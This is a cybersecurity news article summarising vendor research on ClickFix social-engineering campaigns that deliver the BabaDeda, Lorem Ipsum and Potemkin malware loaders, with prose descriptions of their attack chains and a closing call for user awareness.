Cybersecurity researchers have identified a series of evolving ClickFix campaigns that are being used to distribute multiple malware loaders, including BabaDeda Loader, Lorem Ipsum Loader, and Potemkin. According to separate analyses published by Morphisec, BlueVoyant, and Huntress, threat actors are increasingly relying on social engineering techniques and deceptive update prompts to compromise systems and deliver a range of malicious payloads. The campaigns demonstrate how attackers continue to adapt their delivery mechanisms by combining user manipulation with sophisticated malware frameworks capable of deploying information stealers, remote access tools, backdoors, and ransomware related components. Researchers noted that these campaigns target both individuals and organisations across multiple sectors, highlighting the growing use of ClickFix techniques as an initial access method for cybercriminal operations.
One of the campaigns analysed by Morphisec involves BabaDeda Loader, which was observed targeting organisations in the education and financial sectors during April 2026. Researchers reported that the attack begins with a ClickFix social engineering lure that convinces users to execute malicious PowerShell commands. Once activated, the loader uses a combination of hidden PowerShell execution, in memory shellcode, DLL side loading, and external payload storage techniques to evade detection while deploying additional malware. The loader is designed to gather information about the host system, conduct security related checks, and avoid execution on systems located in Russia or Belarus before retrieving and launching its primary payload. Investigators found that malware delivered through BabaDeda Loader can collect detailed system information, extract browser credentials, cookies, browsing history, and encryption keys, capture screenshots, execute commands, and establish encrypted communication channels with command and control infrastructure. Researchers also observed another attack chain leveraging external storage files to conceal payloads used to deploy malware families such as DanaBot and SectopRAT. This modular design allows attackers to separate storage, delivery, and execution functions, making forensic analysis and detection more challenging.
BlueVoyant researchers identified a separate ClickFix campaign distributing the newly documented Lorem Ipsum Loader through compromised WordPress websites spanning industries such as architecture, legal services, and construction technology. Unlike previous campaigns that relied on malicious Microsoft Teams installers distributed through fake download portals, the operators behind Lorem Ipsum Loader shifted to ClickFix based delivery methods after actions targeting malware signing operations disrupted earlier tactics. In these attacks, victims are presented with fraudulent Microsoft Edge security update prompts that encourage them to execute malicious commands. The process downloads a ZIP archive and an outdated Node.js version, which then launches JavaScript based payloads designed to establish persistence and deploy the loader. Researchers attributed the activity with high confidence to a financially motivated threat actor known as Vanilla Tempest, also referred to as Rapid Brigantine. The loader ultimately retrieves a backdoor from attacker controlled social media profiles and supports the delivery of additional payloads associated with ransomware operations, including those linked to the Rhysida malware family. Security researchers noted that the shift demonstrates how threat actors rapidly adapt their techniques when existing delivery methods become ineffective.
Huntress researchers also documented a sophisticated ClickFix campaign involving a previously unknown loader called Potemkin. In this attack chain, victims are directed to install a malicious MSI package that deploys the loader through an HTML Application payload. Potemkin uses a domain generation algorithm to locate command and control infrastructure and loads follow on modules directly into memory. The loader serves as a delivery mechanism for EtherRAT and RMMProject, tools capable of remote screen control, browser credential theft, screenshot capture, script execution, and additional system manipulation activities. Researchers observed attackers conducting hands on keyboard operations after gaining access, including modifying Microsoft Defender settings, creating reverse tunnels, establishing persistence mechanisms, and moving laterally across networks. The findings underscore the continued effectiveness of ClickFix attacks, which rely on convincing users to execute commands that appear legitimate. Security experts emphasise that these campaigns succeed because they exploit trust and routine user behaviour rather than relying solely on software vulnerabilities. As ClickFix techniques continue to evolve across Windows and macOS environments, organisations are being urged to strengthen user awareness, review security controls, and remain vigilant against deceptive prompts that encourage the execution of unexpected commands.
Follow the SPIN IDG WhatsApp Channel for updates across the Smart Pakistan Insights Network covering all of Pakistan’s technology ecosystem.
